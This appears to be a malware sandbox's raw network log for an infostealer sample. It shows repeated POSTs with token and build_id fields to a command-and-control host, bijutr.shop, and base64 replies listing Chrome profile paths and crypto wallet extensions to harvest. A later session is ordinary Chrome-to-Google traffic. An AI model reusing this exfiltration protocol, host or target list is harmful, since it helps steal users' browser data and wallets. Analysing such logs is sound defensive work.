                                                                                                                                                                                                                                                                        2024-12-27 07:20:08 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                                                                                                                                                        Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        4192.168.2.549714188.245.216.2054436584C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:09 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----TRQ9ZCBA1N7QQQI5XT0H
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        2024-12-27 07:20:09 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 54 52 51 39 5a 43 42 41 31 4e 37 51 51 51 49 35 58 54 30 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 32 35 31 64 39 64 32 33 33 66 63 36 63 36 34 64 31 64 65 32 33 65 35 65 61 32 64 64 35 61 0d 0a 2d 2d 2d 2d 2d 2d 54 52 51 39 5a 43 42 41 31 4e 37 51 51 51 49 35 58 54 30 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 66 33 33 66 34 66 31 33 36 61 39 35 36 31 39 61 32 36 32 32 31 64 33 34 61 36 35 35 35 34 30 0d 0a 2d 2d 2d 2d 2d 2d 54 52 51 39 5a 43 42 41 31 4e 37 51 51 51 49 35 58 54 30 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: ------TRQ9ZCBA1N7QQQI5XT0HContent-Disposition: form-data; name="token"46251d9d233fc6c64d1de23e5ea2dd5a------TRQ9ZCBA1N7QQQI5XT0HContent-Disposition: form-data; name="build_id"9f33f4f136a95619a26221d34a655540------TRQ9ZCBA1N7QQQI5XT0HCont
                                                                                                                                                                                                                                                                        2024-12-27 07:20:10 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:10 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2024-12-27 07:20:10 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                                        Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        5192.168.2.549716188.245.216.2054436584C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:12 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----9ZCBASRIWTRIMY5PHVAI
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                        Content-Length: 332
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        2024-12-27 07:20:12 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 39 5a 43 42 41 53 52 49 57 54 52 49 4d 59 35 50 48 56 41 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 32 35 31 64 39 64 32 33 33 66 63 36 63 36 34 64 31 64 65 32 33 65 35 65 61 32 64 64 35 61 0d 0a 2d 2d 2d 2d 2d 2d 39 5a 43 42 41 53 52 49 57 54 52 49 4d 59 35 50 48 56 41 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 66 33 33 66 34 66 31 33 36 61 39 35 36 31 39 61 32 36 32 32 31 64 33 34 61 36 35 35 35 34 30 0d 0a 2d 2d 2d 2d 2d 2d 39 5a 43 42 41 53 52 49 57 54 52 49 4d 59 35 50 48 56 41 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: ------9ZCBASRIWTRIMY5PHVAIContent-Disposition: form-data; name="token"46251d9d233fc6c64d1de23e5ea2dd5a------9ZCBASRIWTRIMY5PHVAIContent-Disposition: form-data; name="build_id"9f33f4f136a95619a26221d34a655540------9ZCBASRIWTRIMY5PHVAICont
                                                                                                                                                                                                                                                                        2024-12-27 07:20:13 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:13 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2024-12-27 07:20:13 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        6192.168.2.549718188.245.216.2054436584C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:14 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----MYUKNY5XBIE37Q9R1VSR
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                        Content-Length: 5253
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        2024-12-27 07:20:14 UTC5253OUTData Raw: 2d 2d 2d 2d 2d 2d 4d 59 55 4b 4e 59 35 58 42 49 45 33 37 51 39 52 31 56 53 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 32 35 31 64 39 64 32 33 33 66 63 36 63 36 34 64 31 64 65 32 33 65 35 65 61 32 64 64 35 61 0d 0a 2d 2d 2d 2d 2d 2d 4d 59 55 4b 4e 59 35 58 42 49 45 33 37 51 39 52 31 56 53 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 66 33 33 66 34 66 31 33 36 61 39 35 36 31 39 61 32 36 32 32 31 64 33 34 61 36 35 35 35 34 30 0d 0a 2d 2d 2d 2d 2d 2d 4d 59 55 4b 4e 59 35 58 42 49 45 33 37 51 39 52 31 56 53 52 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: ------MYUKNY5XBIE37Q9R1VSRContent-Disposition: form-data; name="token"46251d9d233fc6c64d1de23e5ea2dd5a------MYUKNY5XBIE37Q9R1VSRContent-Disposition: form-data; name="build_id"9f33f4f136a95619a26221d34a655540------MYUKNY5XBIE37Q9R1VSRCont
                                                                                                                                                                                                                                                                        2024-12-27 07:20:15 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:15 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2024-12-27 07:20:15 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        7192.168.2.549719188.245.216.2054436584C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:15 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----QIWT0R9H4EUAAIWBA16F
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                        Content-Length: 489
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        2024-12-27 07:20:15 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 51 49 57 54 30 52 39 48 34 45 55 41 41 49 57 42 41 31 36 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 32 35 31 64 39 64 32 33 33 66 63 36 63 36 34 64 31 64 65 32 33 65 35 65 61 32 64 64 35 61 0d 0a 2d 2d 2d 2d 2d 2d 51 49 57 54 30 52 39 48 34 45 55 41 41 49 57 42 41 31 36 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 66 33 33 66 34 66 31 33 36 61 39 35 36 31 39 61 32 36 32 32 31 64 33 34 61 36 35 35 35 34 30 0d 0a 2d 2d 2d 2d 2d 2d 51 49 57 54 30 52 39 48 34 45 55 41 41 49 57 42 41 31 36 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: ------QIWT0R9H4EUAAIWBA16FContent-Disposition: form-data; name="token"46251d9d233fc6c64d1de23e5ea2dd5a------QIWT0R9H4EUAAIWBA16FContent-Disposition: form-data; name="build_id"9f33f4f136a95619a26221d34a655540------QIWT0R9H4EUAAIWBA16FCont
                                                                                                                                                                                                                                                                        2024-12-27 07:20:16 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:16 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2024-12-27 07:20:16 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        8192.168.2.549731172.217.21.364435232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:19 UTC615OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                        Host: www.google.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        2024-12-27 07:20:20 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:19 GMT
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                        Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-fwE2H-FPuGOC51kijJQR2w' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                        Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                        Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                        Server: gws
                                                                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        2024-12-27 07:20:20 UTC124INData Raw: 37 36 35 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 73 71 75 69 64 20 67 61 6d 65 73 22 2c 22 6d 6f 75 6e 74 20 77 61 73 68 69 6e 67 74 6f 6e 20 61 76 61 6c 61 6e 63 68 65 20 63 65 6e 74 65 72 22 2c 22 63 6f 6c 6c 65 67 65 20 66 6f 6f 74 62 61 6c 6c 20 70 6c 61 79 6f 66 66 20 62 72 61 63 6b 65 74 73 22 2c 22 61 75 72 6f 72 61 20 62 6f 72 65 61 6c 69 73 20 6e 6f 72 74 68 65
                                                                                                                                                                                                                                                                        Data Ascii: 765)]}'["",["squid games","mount washington avalanche center","college football playoff brackets","aurora borealis northe
                                                                                                                                                                                                                                                                        2024-12-27 07:20:20 UTC1390INData Raw: 72 6e 20 6c 69 67 68 74 73 20 66 6f 72 65 63 61 73 74 22 2c 22 6d 6f 6e 6f 70 6f 6c 79 20 67 6f 20 67 69 6e 67 65 72 62 72 65 61 64 20 67 61 6c 61 22 2c 22 77 65 73 74 65 72 6e 20 77 79 6f 6d 69 6e 67 20 73 6e 6f 77 20 61 64 76 69 73 6f 72 79 22 2c 22 68 65 72 74 7a 20 74 65 73 6c 61 20 72 65 6e 74 61 6c 22 2c 22 6e 6f 73 66 65 72 61 74 75 20 32 30 32 34 20 76 61 6d 70 69 72 65 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68
                                                                                                                                                                                                                                                                        Data Ascii: rn lights forecast","monopoly go gingerbread gala","western wyoming snow advisory","hertz tesla rental","nosferatu 2024 vampire"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2Vh
                                                                                                                                                                                                                                                                        2024-12-27 07:20:20 UTC386INData Raw: 5a 61 61 53 39 73 64 45 6c 54 55 32 4a 4e 4d 58 64 44 56 47 63 7a 52 6c 46 52 53 33 52 72 61 46 5a 52 51 6d 45 30 56 7a 4a 4c 57 57 4d 77 63 45 46 76 52 45 39 6d 62 47 70 72 64 57 5a 56 4e 6b 35 77 61 56 4a 77 52 79 39 44 54 30 39 46 64 44 46 75 59 32 4e 32 55 30 35 54 52 6c 70 55 65 55 52 56 65 55 70 6b 53 57 6c 49 5a 58 63 30 51 55 63 31 55 44 42 34 55 48 70 76 5a 6c 42 77 4e 6c 6c 68 62 57 56 76 61 30 56 6a 59 55 6c 76 57 58 52 6a 4e 33 52 68 4c 30 46 44 4e 56 42 5a 5a 47 4a 5a 52 6c 70 36 4e 48 4e 73 65 53 74 71 5a 56 67 77 55 46 46 6e 63 30 4e 58 55 48 4a 6b 64 48 49 76 64 30 4d 34 53 54 46 57 62 57 78 55 55 6e 56 74 59 56 5a 61 51 7a 56 71 53 6b 67 35 65 47 68 4a 4d 6d 38 30 61 69 39 72 64 43 74 4a 4b 7a 63 35 5a 57 31 49 56 54 42 47 65 6d 73 32 5a
                                                                                                                                                                                                                                                                        Data Ascii: ZaaS9sdElTU2JNMXdDVGczRlFRS3RraFZRQmE0VzJLWWMwcEFvRE9mbGprdWZVNk5waVJwRy9DT09FdDFuY2N2U05TRlpUeURVeUpkSWlIZXc0QUc1UDB4UHpvZlBwNllhbWVva0VjYUlvWXRjN3RhL0FDNVBZZGJZRlp6NHNseStqZVgwUFFnc0NXUHJkdHIvd0M4STFWbWxUUnVtYVZaQzVqSkg5eGhJMm80ai9rdCtJKzc5ZW1IVTBGems2Z
                                                                                                                                                                                                                                                                        2024-12-27 07:20:20 UTC89INData Raw: 35 33 0d 0a 52 61 55 6e 5a 36 64 47 68 74 65 57 35 33 61 6c 42 49 52 33 42 78 53 48 51 78 4d 6a 52 5a 5a 47 4e 73 55 32 70 75 59 31 52 55 57 6d 45 33 4e 56 56 6c 55 44 64 71 59 6b 68 72 54 32 46 57 55 53 73 34 56 6b 70 42 55 44 56 7a 57 48 6c 6c 52 6e 5a 53 64 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 53RaUnZ6dGhteW53alBIR3BxSHQxMjRZZGNsU2puY1RUWmE3NVVlUDdqYkhrT2FWUSs4VkpBUDVzWHllRnZSd
                                                                                                                                                                                                                                                                        2024-12-27 07:20:20 UTC1390INData Raw: 31 31 32 66 0d 0a 31 70 4b 57 6e 4a 78 64 54 56 51 59 6b 52 59 52 45 56 44 63 44 4e 7a 54 57 4e 55 4e 33 6f 33 57 44 6c 7a 5a 58 6f 72 57 54 6c 6a 55 7a 6c 34 64 6c 56 68 52 56 68 61 61 53 74 74 56 56 56 36 63 57 74 72 52 33 42 33 64 54 42 72 56 6a 6c 4d 5a 6b 78 32 4d 6a 55 30 53 79 74 71 57 6d 4a 73 4f 45 52 54 63 45 68 46 61 31 5a 79 62 48 6c 43 65 44 56 6e 4f 44 63 30 61 45 39 6f 63 44 5a 76 63 32 68 44 64 6d 4a 61 4e 32 5a 76 55 6e 70 48 51 54 4a 6c 57 6a 6c 53 56 44 46 4d 56 55 30 30 61 46 4a 6e 61 6b 64 77 4d 58 6b 72 63 54 64 68 55 30 56 56 52 44 4e 71 5a 6a 46 31 64 31 68 6d 63 47 64 73 55 54 4a 4f 61 55 56 73 61 57 64 78 63 6d 46 4b 65 45 46 49 61 58 56 7a 62 33 4e 34 63 56 4a 6b 57 57 30 34 5a 79 74 5a 61 56 4e 50 54 46 68 30 63 32 52 4a 54 7a
                                                                                                                                                                                                                                                                        Data Ascii: 112f1pKWnJxdTVQYkRYREVDcDNzTWNUN3o3WDlzZXorWTljUzl4dlVhRVhaaSttVVV6cWtrR3B3dTBrVjlMZkx2MjU0SytqWmJsOERTcEhFa1ZybHlCeDVnODc0aE9ocDZvc2hDdmJaN2ZvUnpHQTJlWjlSVDFMVU00aFJnakdwMXkrcTdhU0VVRDNqZjF1d1hmcGdsUTJOaUVsaWdxcmFKeEFIaXVzb3N4cVJkWW04ZytZaVNPTFh0c2RJTz
                                                                                                                                                                                                                                                                        2024-12-27 07:20:20 UTC1390INData Raw: 5a 53 51 56 64 4a 51 6a 42 70 53 57 6c 42 5a 45 68 34 4f 47 74 4c 52 46 46 7a 53 6b 4e 5a 65 45 70 34 4f 47 5a 4d 56 44 42 30 54 56 52 56 4d 30 39 71 62 7a 5a 4a 65 58 4d 76 55 6b 51 34 4e 46 46 36 55 54 56 50 61 6d 4e 43 51 32 64 76 53 30 52 52 64 30 35 48 5a 7a 68 51 52 32 70 6a 62 45 68 35 56 54 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 69 38 76 51 55 46 43 52 55 6c 42 52 55 46 42 55 55 46 4e 51 6b 6c 6e 51 55 4e 46 55 55 56 45 52 56 46 49 4c 33 68 42 51 57 4e 42 51 55 46 44 51 57 64 4e 51 6b 46 52 51 55 46 42 51 55 46 42 51 55 46 42 51
                                                                                                                                                                                                                                                                        Data Ascii: ZSQVdJQjBpSWlBZEh4OGtLRFFzSkNZeEp4OGZMVDB0TVRVM09qbzZJeXMvUkQ4NFF6UTVPamNCQ2dvS0RRd05HZzhQR2pjbEh5VTNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTi8vQUFCRUlBRUFBUUFNQklnQUNFUUVERVFIL3hBQWNBQUFDQWdNQkFRQUFBQUFBQUFBQ
